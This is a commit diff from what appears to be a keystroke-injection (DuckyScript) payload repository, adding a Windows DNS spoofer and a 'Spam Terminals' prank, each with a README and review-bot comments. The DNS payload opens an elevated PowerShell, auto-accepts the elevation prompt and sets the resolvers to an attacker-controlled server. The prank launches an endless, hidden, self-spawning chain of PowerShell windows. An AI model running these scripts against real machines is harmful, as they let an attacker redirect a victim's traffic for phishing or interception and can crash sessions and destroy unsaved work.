Compare commits
5 Commits
d31f994848
...
c58b930f58
Author | SHA1 | Date |
---|---|---|
Aleff | c58b930f58 | |
Peaks | 5f13d6090f | |
Luu | 1a1c79d5ba | |
Luu | 203d986ae4 | |
Aleff | 47fa68ecd9 |
|
@ -0,0 +1,27 @@
|
||||||
|
# Spoof DNS - Windows ✅
|
||||||
|
|
||||||
|
DNS Spoofer
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the primary and secondary dns servers
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
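Review bot: The Settings list in this README names only the primary and secondary DNS servers, but the payload added alongside it also takes an interface alias (`DEFINE #interface Ethernet`), and nothing here says that the payload opens an elevated PowerShell or that the DNS change stays in place after the run. Add the interface alias to Settings and a short restore note, for example `Set-DnsClientServerAddress -InterfaceAlias "<alias>" -ResetServerAddresses`, so a tester can return the host to its DHCP-assigned resolvers. The stray `DNS Spoofer` line under the title duplicates the heading and can go.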
@ -0,0 +1,69 @@
|
||||||
|
REM Title: DNS changer
|
||||||
|
REM Author: luu176
|
||||||
|
REM Description: Changes DNS address of windows machine in powershell
|
||||||
|
REM Target: Windows 10/11
|
||||||
|
|
||||||
|
REM wifi interface should be named: Wi-Fi
|
||||||
|
DEFINE #interface Ethernet
|
||||||
|
DEFINE #primaryDNS 192.168.1.3
|
||||||
|
DEFINE #secondaryDNS 1.1.1.1
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
GUI r
|
||||||
|
DELAY 150
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
|
||||||
|
REM below is to blink the LED when payload done
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < 9 )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
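Review bot: The comment `REM wifi interface should be named: Wi-Fi` contradicts the line directly below it, `DEFINE #interface Ethernet`. Make the comment describe the value that is actually set, or state that the alias must match the adapter name on the host, so the header and the configuration cannot drift apart. The title in the header (`DNS changer`) also differs from the README title in the same change (`Spoof DNS - Windows`); pick one name for both files.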
@ -0,0 +1,23 @@
|
||||||
|
# Windows Spam Terminals
|
||||||
|
|
||||||
|
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
|
||||||
|
|
||||||
|
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Windows Spam Terminals
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Prank
|
||||||
|
- **Target**: Windows
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
This payload is plug and play <3
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
|
||||||
|
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals
|
||||||
|
|
|
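Review bot: Step 2 of How It Works says the script runs "after readiness is confirmed", but the payload in this change never reads `$_OS`: the extension waits at most `#MAX_WAIT` checks and the `GUI r` sequence is then sent whatever the result. Either reword the step to say the extension only acts as a boot delay, or gate the payload body on `IF ($_OS == WINDOWS) THEN` as the extension's own example block shows. The same sentence also needs a grammar pass ("the script executes a PowerShell script that creates").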
@ -0,0 +1,58 @@
|
||||||
|
REM_BLOCK
|
||||||
|
############################################
|
||||||
|
# #
|
||||||
|
# Title : Windows Spam Terminals #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : Windows #
|
||||||
|
# #
|
||||||
|
############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"
|
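Review bot: The final `STRINGLN` line runs `while ($true)` with no iteration cap or stop condition, while the README added in this change already warns that unsaved data can be lost. Bound the loop with a count taken from a `DEFINE` and document how to stop it, so an authorised test leaves the host recoverable. The nested `Start-Process` arguments with escaped quotes are also hard to follow; a short `REM` stating what each level starts would help the next reader.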